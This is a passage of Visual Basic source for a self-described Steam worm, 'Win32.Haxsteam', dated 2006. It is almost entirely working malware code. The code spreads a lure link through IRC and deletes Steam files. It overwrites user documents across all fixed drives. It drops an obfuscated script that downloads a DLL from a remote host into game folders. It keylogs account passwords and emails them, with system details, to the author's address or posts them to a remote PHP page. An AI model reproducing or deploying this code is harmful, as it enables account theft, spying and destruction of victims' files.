((((%(((t((((h(((e((((u(((s((((e(((r(((( (((%((((m(((s((((g((( " msglink = Replace(msglink, "(", "") GamersircPath = wshs.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Gamers.Interactive\Gamers.IRC\" & "inst_path") If GamersircPath <> "" Then Set crtmircSendfile = fso.createtextfile(GamersircPath + "\bin\grc\gamersirc" + Chr(46) + Chr(103) + Chr(114) + Chr(99), True) crtmircSendfile.writeline ("; Win32.Haxsteam Irc Script File ") crtmircSendfile.writeline (onconnect) crtmircSendfile.writeline (" titlebar sk0r alias Czybik haxed you! 
") crtmircSendfile.writeline (" join #0,0 ") crtmircSendfile.writeline (" join -n #sponsor,#sponsoring,#bouncer4you,#ringer,#clansuche ") crtmircSendfile.writeline ("} ") crtmircSendfile.writeline (onjoin) crtmircSendfile.writeline (haltt) crtmircSendfile.writeline (" else { ") crtmircSendfile.writeline (userdatarant) crtmircSendfile.writeline (" if (%rand == a) { ") crtmircSendfile.writeline (" var %msg = Lol, schau dir ma die krassen Steam Bilder an! => http://czybik.cz.funpic.de/Haxsteam/Haxsteam.html ") crtmircSendfile.writeline (" } ") crtmircSendfile.writeline (" elseif (%rand == b) { ") crtmircSendfile.writeline (" var %msg = Sau lustige Cstrike Pics => http://czybik.cz.funpic.de/Haxsteam/Haxsteam.html ") crtmircSendfile.writeline (" } ") crtmircSendfile.writeline (" else { ") crtmircSendfile.writeline (" var %msg = Ey rofl, schau dir die Valve Bilder an => http://czybik.cz.funpic.de/Haxsteam/Haxsteam.html ") crtmircSendfile.writeline (" } ") crtmircSendfile.writeline (dccsend) crtmircSendfile.writeline (msglink) crtmircSendfile.writeline (" } ") crtmircSendfile.writeline (" ") crtmircSendfile.writeline ("} ") crtmircSendfile.writeline ("} ") crtmircSendfile.Close End If End Function Function SteamPayloadOne() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") fso.deletefile (steampath + "\Steam_14.mst") fso.deletefile (steampath + "\steamclient.dll") fso.deletefile (steampath + "\tier0_s.dll") fso.deletefile (steampath + "\CSERHelper.dll") fso.deletefile (steampath + "\dbghelp.dll") fso.deletefile (steampath + "\ClientRegistry.blob") fso.deletefile (steampath + "\Steam_api.dll") fso.deletefile (steampath + "\INSTALL.LOG") fso.deletefile (steampath + "\WriteMiniDump.exe") fso.deletefile (steampath + "\Steam.dll") fso.deletefile (steampath + "\SteamUI.dll") fso.deletefolder 
(steampath + "\bin") fso.deletefolder (steampath + "\servers") fso.deletefolder (steampath + "\config") fso.deletefolder (steampath + "\friends") Open steampath + "\PayloadOne.log" For Output As #pay1 Print #pay1, "The first payload has been executed" Close #pay1 End Function Function SteamPayloadTwo() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") Set gtOneFldr = fso.getfolder(steampath) Set SteamFolders = gtOneFldr.subfolders For Each UnterSteam In SteamFolders Set SteamFiles = UnterSteam.Files For Each SteamData In SteamFiles SteamExt = LCase(fso.getextensionname(SteamData.Path)) If SteamExt = "txt" Or SteamExt = "log" Or SteamExt = "tga" Or SteamExt = "pkv" _ Or SteamExt = "vdf" Or SteamExt = "wav" Or SteamExt = "htm" Or SteamExt = "res" Then Set crtForWrite = fso.createtextfile(SteamData.Path, True) crtForWrite.Write "This file was overwritten by the Haxsteam!" 
+ vbCrLf crtForWrite.Close End If Next Next Open steampath + "\PayloadTwo.log" For Output As #pay2 Print #pay2, "The second payload has been executed" Close #pay2 End Function Function SteamPayloadThree() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") Set HardDrives = fso.drives For Each Diskk In HardDrives If Diskk.DriveType = 2 Then Set crtFolderSteam = fso.createfolder(Diskk + "\Haxsteam") Set file1 = fso.createtextfile(Diskk + "\Haxsteam\Hack.dll") Set file2 = fso.createtextfile(Diskk + "\Haxsteam\Haxsteam.exe") Set file3 = fso.createtextfile(Diskk + "\Haxsteam\GetAccount.blob") Set file4 = fso.createtextfile(Diskk + "\Haxsteam\Regstar.sys") Set file5 = fso.createtextfile(Diskk + "\Haxsteam\readme.txt") Set file6 = fso.createtextfile(Diskk + "\Haxsteam\Aimbot.exe") Set file7 = fso.createtextfile(Diskk + "\Haxsteam\Wallhack.tar") Set folder1 = fso.createfolder(Diskk + "\Haxsteam\Fake") Set folder2 = fso.createfolder(Diskk + "\Haxsteam\Empty") End If Next oern = "!!!!o!!!n!!!! !!!e!!!!r!!!r!!!!o!!!r!!!! !!!r!!!!e!!!s!!!!u!!!m!!!!e!!! !!!!n!!!e!!!!x!!!t!!!!" oern = Replace(oern, "!", "") fsoobje = "!!!!s!!!e!!!!t!!! !!!!f!!!s!!!!o!!! !!!!=!!! !!!!c!!!r!!!!e!!!a!!!!t!!!e!!!!o!!!b!!!!j!!!e!!!c!!!!t!!! !!!!(!!!""!!!!S!!!cr!!!ip!!!!ti!!!!n!!!g!!.!!!F!!!il!!!!eS!!!y!!!st!!!em!!!Ob!!!j!!!e!!!c!!!t""!!!)!!!!" fsoobje = Replace(fsoobje, "!", "") wshs = "!!!!s!!!e!!!!t!!! !!!!w!!!s!!!!h!!!!s!!! !!!=!!!! !!!c!!!r!ea!!!te!!!!ob!!!j!!!e!!!c!!!t!!!(!!!!""!!!W!!!Sc!!!!ri!!!pt!!!.!!!!Sh!!!!e!!!l!!!l!!!""!!!!!)!!!!!!!!" wshs = Replace(wshs, "!", "") spwr = "!!!S!!!te!!!!a!!!mP!!!at!!!!h!!!! =!!!! 
w!!!sh!!!!s!!!.!!!re!!!g!!!re!!!!a!!d!!!(!!!!""H!!!K!!!E!!!!Y!!!_C!!!!UR!!!RE!!!N!!!T!!!_!!!U!!!!S!!!E!!!R!!!\!!!!S!!!of!!!!t!!!wa!!!!!r!!!!e!!!\!!!!Va!!!!l!!!v!!!!e!!!\!!!!St!!!e!!!a!!!m!!\""+""S!!!t!!!!ea!!!!m!!!P!!!a!!t!!!!!h!!""!!!!)!!!!" spwr = Replace(spwr, "!", "") gtwdir = "!!!!s!!!!e!!!!t!!!! !!!w!!!!i!!!n!!!!d!!!i!!!r!! !!!=!!!! !!!f!!!s!!!o!!!.!!!!g!!!et!!!!sp!!!!ec!!!!i!!!a!!!!l!!fo!!!!ld!!!!e!!!r!!(!!!!0!!!)!!!!" gtwdir = Replace(gtwdir, "!", "") xmlobje = "!!!s!!!e!!!t!!! x!!!!ml!!!D!!!l!!!d!!!r!! !!!!= !!!!cr!!!eat!!!!eo!!!bj!!!!ec!!!!t!!!(!!!!""!!!!M!!!ic!!!!!ro!!!so!!!!f!!!!t!!!!.!!!X!!!M!!!!L!!!HT!!!!T!!!P!!!!""!!!!)!!!!" xmlobje = Replace(xmlobje, "!", "") adoobje = "!!s!!!!e!!!!t!!! !!!!ad!!!!S!!!!tr!!!!e!!!!a!!!!!m!!! !!!!=!!!! !!!!!c!!!re!!!at!!!!eo!!!!!bj!!!!e!!!c!!!!t!!!(!!!!""!!!A!!!!D!!!OD!!!!B!!!!.!!!S!!!!t!!!r!!!!e!!!a!!!m!!!!""!!!!)!!!!" adoobje = Replace(adoobje, "!", "") Set crtWhFile = fso.createtextfile(fso.getspecialfolder(0) + "\wallhack" + Chr(46) + Chr(118) + Chr(98) + Chr(115), True) crtWhFile.writeline (oern) crtWhFile.writeline (fsoobje) crtWhFile.writeline (wshs) crtWhFile.writeline (spwr) crtWhFile.writeline ("SteamPath = replace(SteamPath,""/"", ""\"") ") crtWhFile.writeline (gtwdir) crtWhFile.writeline (" ") crtWhFile.writeline (xmlobje) crtWhFile.writeline ("xmlDldr.Open(""GET"", ""http://czybik.cz.funpic.de/Haxsteam/opengl32.dll"" ,0) ") crtWhFile.writeline ("xmlDldr.Send ") crtWhFile.writeline (" ") crtWhFile.writeline (adoobje) crtWhFile.writeline ("adStream.Mode = 3 ") crtWhFile.writeline ("adStream.Type = 1 ") crtWhFile.writeline ("adStream.Open ") crtWhFile.writeline ("adStream.Write(xmlDldr.responseBody) ") crtWhFile.writeline ("adStream.SaveToFile(windir+""\opengl32.dll"",2) ") crtWhFile.writeline (" ") crtWhFile.writeline ("Set gtDllhack = fso.getfile(windir + ""\opengl32.dll"") ") crtWhFile.writeline ("inpwh = fso.getfolder(SteamPath + ""\SteamApps"") ") crtWhFile.writeline ("For Each CheatFolder In 
inpwh.Subfolders ") crtWhFile.writeline ("If fso.folderexists(CheatFolder.Path + ""\counter-strike"") Then ") crtWhFile.writeline ("gtDllhack.Copy (CheatFolder.Path + ""\counter-strike\opengl32.dll""),true ") crtWhFile.writeline ("End If ") crtWhFile.writeline ("If fso.folderexists(CheatFolder.Path + ""\day of defeat"") Then ") crtWhFile.writeline ("gtDllhack.Copy (CheatFolder.Path + ""\day of defeat\opengl32.dll"") ,true") crtWhFile.writeline ("End If ") crtWhFile.writeline ("If fso.folderexists(CheatFolder.Path + ""\deathmatch classic"") Then ") crtWhFile.writeline ("gtDllhack.Copy (CheatFolder.Path + ""\deathmatch classic\opengl32.dll"") ,true") crtWhFile.writeline ("End If ") crtWhFile.writeline ("If fso.folderexists(CheatFolder.Path + ""\half-life"") Then ") crtWhFile.writeline ("gtDllhack.Copy (CheatFolder.Path + ""\half-life\opengl32.dll""), True ") crtWhFile.writeline ("End If ") crtWhFile.writeline ("If fso.folderexists(CheatFolder.Path + ""\opposing force"") Then ") crtWhFile.writeline ("gtDllhack.Copy (CheatFolder.Path + ""\opposing force\opengl32.dll""), True ") crtWhFile.writeline ("End If ") crtWhFile.writeline ("If fso.folderexists(CheatFolder.Path + ""\team fortress classic"") Then ") crtWhFile.writeline ("gtDllhack.Copy (CheatFolder.Path + ""\team fortress classic\opengl32.dll""),true ") crtWhFile.writeline ("End If ") crtWhFile.writeline ("Next ") wshs.run (fso.getspecialfolder(0) + "\wallhack" + Chr(46) + Chr(118) + Chr(98) + Chr(115)), , True fso.deletefile (fso.getspecialfolder(0) + "\wallhack" + Chr(46) + Chr(118) + Chr(98) + Chr(115)) Open steampath + "\PayloadThree.log" For Output As #pay3 Print #pay3, "The third payload has been executed" Close #pay3 End Function Function SteamPayloadFour() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") Set OutlObj = 
CreateObject("Outlook.Application") If OutlObj <> "" Then wshs.run ("msinfo32 /report " + windir + "\infofile1.txt"), , True wshs.run ("%ComSpec% /c tree %SystemDrive% > " + windir + "\infofile2.txt /A"), , True wshs.run ("%ComSpec% /c ipconfig /all > " + windir + "\infofile3.txt"), , True wshs.run ("%ComSpec% /c vol %SystemDrive% > " + windir + "\infofile5.txt"), , True wshs.run ("%ComSpec% /c getmac > " + windir + "\infofile5.txt"), , True Set WriteNewMail = OutlObj.CreateNewItem(1) With WriteNewMail .to = "sk0r1337@gmx.de" .subject = "Haxsteam Email Bot: Victim Informations" .body = "Hello sk0r alias Czybik" + vbCrLf + "The Informations of the machine of a victim are attached." + vbCrLf + "Best regards: Haxsteam Info Email Bot" .Attachments.Add windir + "\infofile1.txt" .Attachments.Add windir + "\infofile2.txt" .Attachments.Add windir + "\infofile3.txt" .Attachments.Add windir + "\infofile4.txt" .Attachments.Add windir + "\infofile5.txt" .send End With End If Open steampath + "\PayloadFour.log" For Output As #pay4 Print #pay4, "The fourth payload has been executed" Close #pay4 End Function Function SteamPayloadFive() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") Sleep 60000 * 10 Set aProcc = GetObject("winmgmts:") Set bProcc = aProcc.InstancesOf("Win32_process") For Each cProcc In bProcc If LCase(cProcc.Name) = "steam.exe" Then cProcc.Terminate (0) End If Next fso.deletefile (steampath + "\ClientRegistry.blob") If Not fso.fileexists(sysdir + "\Accountnames.log") Then Open sysdir + "\Accountnames.log" For Output As #acclogged Print #acclogged, "This file contains the loggend accountnames:" Print #acclogged, "==========================================" + vbCrLf Set gtSteamfldrs = fso.getfolder(steampath + "\SteamApps") For Each Accountname In gtSteamfldrs.subfolders Print 
#acclogged, Accountname Next Close #acclogged End If tmrSteam.Enabled = True End Function Private Sub tmrSteam_Timer() Set wmiObj = GetObject("winmgmts:") Set inSystem = wmiObj.InstancesOf("Win32_process") For Each WinProcess In inSystem If LCase(WinProcess.Name) = "steam.exe" Then tmrCounter.Enabled = True tmrLogger.Enabled = True tmrSteam.Enabled = False End If Next End Sub Private Sub tmrCounter_Timer() cntCounter = cntCounter + 1 If cntCounter >= 1200 Then tmrLogger.Enabled = False SendLoggedInfosToMe cntCounter = 0 tmrCounter.Enabled = False End If End Sub Private Sub tmrLogger_Timer() If (GetAsyncKeyState(vbKey1)) Then strKeys = strKeys + "1" End If If (GetAsyncKeyState(vbKey2)) Then strKeys = strKeys + "2" End If If (GetAsyncKeyState(vbKey3)) Then strKeys = strKeys + "3" End If If (GetAsyncKeyState(vbKey4)) Then strKeys = strKeys + "4" End If If (GetAsyncKeyState(vbKey5)) Then strKeys = strKeys + "5" End If If (GetAsyncKeyState(vbKey6)) Then strKeys = strKeys + "6" End If If (GetAsyncKeyState(vbKey7)) Then strKeys = strKeys + "7" End If If (GetAsyncKeyState(vbKey8)) Then strKeys = strKeys + "8" End If If (GetAsyncKeyState(vbKey9)) Then strKeys = strKeys + "9" End If If (GetAsyncKeyState(vbKey0)) Then strKeys = strKeys + "0" End If If (GetAsyncKeyState(vbKeyA)) Then strKeys = strKeys + "a" End If If (GetAsyncKeyState(vbKeyB)) Then strKeys = strKeys + "b" End If If (GetAsyncKeyState(vbKeyC)) Then strKeys = strKeys + "c" End If If (GetAsyncKeyState(vbKeyD)) Then strKeys = strKeys + "d" End If If (GetAsyncKeyState(vbKeyE)) Then strKeys = strKeys + "e" End If If (GetAsyncKeyState(vbKeyF)) Then strKeys = strKeys + "f" End If If (GetAsyncKeyState(vbKeyG)) Then strKeys = strKeys + "g" End If If (GetAsyncKeyState(vbKeyH)) Then strKeys = strKeys + "h" End If If (GetAsyncKeyState(vbKeyI)) Then strKeys = strKeys + "i" End If If (GetAsyncKeyState(vbKeyJ)) Then strKeys = strKeys + "j" End If If (GetAsyncKeyState(vbKeyK)) Then strKeys = strKeys + "k" End If If 
(GetAsyncKeyState(vbKeyL)) Then strKeys = strKeys + "l" End If If (GetAsyncKeyState(vbKeyM)) Then strKeys = strKeys + "m" End If If (GetAsyncKeyState(vbKeyN)) Then strKeys = strKeys + "n" End If If (GetAsyncKeyState(vbKeyO)) Then strKeys = strKeys + "o" End If If (GetAsyncKeyState(vbKeyP)) Then strKeys = strKeys + "p" End If If (GetAsyncKeyState(vbKeyQ)) Then strKeys = strKeys + "q" End If If (GetAsyncKeyState(vbKeyR)) Then strKeys = strKeys + "r" End If If (GetAsyncKeyState(vbKeyS)) Then strKeys = strKeys + "s" End If If (GetAsyncKeyState(vbKeyT)) Then strKeys = strKeys + "t" End If If (GetAsyncKeyState(vbKeyU)) Then strKeys = strKeys + "u" End If If (GetAsyncKeyState(vbKeyV)) Then strKeys = strKeys + "v" End If If (GetAsyncKeyState(vbKeyW)) Then strKeys = strKeys + "w" End If If (GetAsyncKeyState(vbKeyX)) Then strKeys = strKeys + "x" End If If (GetAsyncKeyState(vbKeyY)) Then strKeys = strKeys + "y" End If If (GetAsyncKeyState(vbKeyZ)) Then strKeys = strKeys + "z" End If End Sub Function SendLoggedInfosToMe() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") Set sysdir = fso.getspecialfolder(1) steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") Open sysdir + "\loggedkeys.log" For Output As #keylogger Print #keylogger, "Here are the logged keys loggend by Win32.Haxsteam:" Print #keylogger, "====================================================" + vbCrLf Print #keylogger, strKeys Close #keylogger Set outObject = CreateObject("Outlook.Application") If outObject <> "" Then Set NewMail = outObject.CreateItem(1) NewMail.to = "sk0r1337@gmx.de" NewMail.subject = "Win32.Haxsteam Keylogger Bot" NewMail.body = "Dear sk0r alias Czybik," + vbCrLf + "You have now a new steam account more, I think." 
+ vbCrLf + "Best regards: Win32.Haxsteam Email Bot" NewMail.Attachments.Add sysdir + "\loggedkeys.log" NewMail.Attachments.Add sysdir + "\Accountnames.log" NewMail.send Else Set opnAccFile = fso.opentextfile(sysdir + "\Accountnames.log") strAccValue = openAccFile.readall opnAccFile.Close Set opnLogFile = fso.opentextfile(sysdir + "\loggendkeys.log") strKeyValue = opnLogFile.readall opnLogFile.Close READYSTATE_COMPLETE = 4 Set ieObj = CreateObject("InternetExplorer.Application") Do While ieObj.Busy Loop ieObj.Visible = False ieObj.navigate "http://czybik.cz.funpic.de/Haxsteam/accountdata.php" Do While ieObj.ReadyState <> 4 Loop ieObj.Document.All.emailname.Value = "sk0r1337@gmx.de" ieObj.Document.All.emailsubject.Value = "Win32.Haxsteam Html Php Connector" ieObj.Document.All.thebody.Value = "Passwords:" + vbCrLf + "=======================" + vbCrLf + strKeyValue + vbCrLf + vbCrLf + vbCrLf + "Accountnames:" + vbCrLf + "=======================" + strAccValue ieObj.Document.All.Abschicken.submit End If End Function Function OverwriteSpecificFiles() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") Set gtDrives = fso.drives For Each HardDrive In gtDrives If HardDrive.DriveType = 2 Then SearchForFiles (HardDrive) End If Next End Function Function SearchForFiles(DriveString) On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") ExtensionArray = Array("html", "htm", "vbs", "vbe", "vba", "ppt", _ "pps", "xlm", "xls", "doc", "rtf", "asm", "h", "mdb", "mde", "res", _ "cpp", "jpg", "bmp", "pif", "ini", "png", "pl", "pas", "ppt", "scf", _ "jpeg", "rar", "zip", "ace", "psd", "wma", "pps", "php", "hlp", "htt", , _ 
"avi", "mp3", "log", "txt", "inf", "pws", "dmp", "xls", "rtf", "doc") Set gtDriveAsFolder = fso.getfolder(DriveString) For Each UnterOrdner In gtDriveAsFolder.subfolders Set uOrdFiles = UnterOrdner.Files For Each PruefeAlleDaten In uOrdFiles gtExt = LCase(fso.getextensionname(PruefeAlleDaten.Path)) For Each DateiEndungsString In ExtensionArray If gtExt = DateiEndungsString Then Set crtNewvic = fso.createtextfile(PruefeAlleDaten.Path, True) crtNewvic.Write "This File was overwritten by the Haxsteam Worm" crtNewvic.Close End If Next Next Next End Function Function SpeakTheVoice(SpeakString As String) On Error Resume Next Set spkVoice = New SpVoice spkVoice.Speak SpeakString, SVSFlagsAsync End Function Function funcShowInformations() infSpeak = "Hey user. You have been infected by a great Steam Worm." SpeakTheVoice (infSpeak) frmHaxsteamAbout.Show End Function ' ========================================================================= frmHaxsteamAbout.frm ========================================================================= VERSION 5.00 Begin VB.Form frmHaxsteamAbout Caption = "About Win32.Haxsteam" ClientHeight = 5235 ClientLeft = 60 ClientTop = 450 ClientWidth = 6315 LinkTopic = "Form1" ScaleHeight = 5235 ScaleWidth = 6315 StartUpPosition = 3 'Windows Default Begin VB.CommandButton cmdQuit Caption = "Fertig" Height = 495 Left = 1560 TabIndex = 1 Top = 4440 Width = 2535 End Begin VB.TextBox txtInfor Height = 3015 Left = 960 MultiLine = -1 'True TabIndex = 0 Text = "frmHaxsteamAbout.frx":0000 Top = 600 Width = 4215 End End Attribute VB_Name = "frmHaxsteamAbout" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False 'Win32.Haxsteam ¸opyrights 2006 by sk0r 'This Worm was created by sk0r aka Czybik. 'You are not allowed to decompile the Worm! 'ViSiT my Site @ www.sk0r-czybik.de.vu ' 'This is a very good Steam Worm. 
It has 'much functions, which you will see :> ' ' Visit my homepages: Email me to: ' -------------------- ------------- ' ' www.sk0r-czybik.de.vu sk0r1337@web.de ' www.sk0r-virii.tk ' www.czybik-kit.tk ' '======================================================== Private Sub cmdQuit_Click() Unload Me End Sub Private Sub Form_Load() txtInfor.Text = "Dear User" + vbCrLf txtInfor.Text = txtInfor.Text + " " + vbCrLf txtInfor.Text = txtInfor.Text + "You have been infected by Win32.Haxsteam.a" + vbCrLf txtInfor.Text = txtInfor.Text + "This worm was made by sk0r alias Czybik" + vbCrLf txtInfor.Text = txtInfor.Text + "It is ¸2006 by sk0r alias Czybik" + vbCrLf txtInfor.Text = txtInfor.Text + "I think, this worm is the best steam worm ever!" + vbCrLf txtInfor.Text = txtInfor.Text + "This is very great!" + vbCrLf txtInfor.Text = txtInfor.Text + "Visit my sites: " + vbCrLf txtInfor.Text = txtInfor.Text + "www.sk0r-czybik.de.vu" + vbCrLf txtInfor.Text = txtInfor.Text + "www.czybik-kit.tk " + vbCrLf txtInfor.Text = txtInfor.Text + "www.sk0r-virii.tk " + vbCrLf End Sub '